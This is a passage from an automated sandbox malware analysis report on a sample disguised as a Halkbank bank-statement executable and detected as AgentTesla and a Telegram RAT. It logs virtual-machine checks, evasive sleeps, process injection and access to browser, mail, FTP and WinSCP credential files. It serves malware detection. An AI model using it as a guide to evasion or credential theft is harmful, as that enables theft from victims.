Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe TID: 6664 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe TID: 6448 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3876 Thread sleep count: 152 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6952 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6956 Thread sleep count: 5109 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6956 Thread sleep count: 3660 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6036 Thread sleep count: 130 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2536 Thread sleep count: 87 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3660 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5BB28 LdrInitializeThunk, 15_2_06A5BB28
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 436000 Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000 Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10EA008 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20 Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.386534863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.386867081.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.386199386.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Halkbank_Ekstre_20220513_082357_541079.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ffnbziuo.exe PID: 4600, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
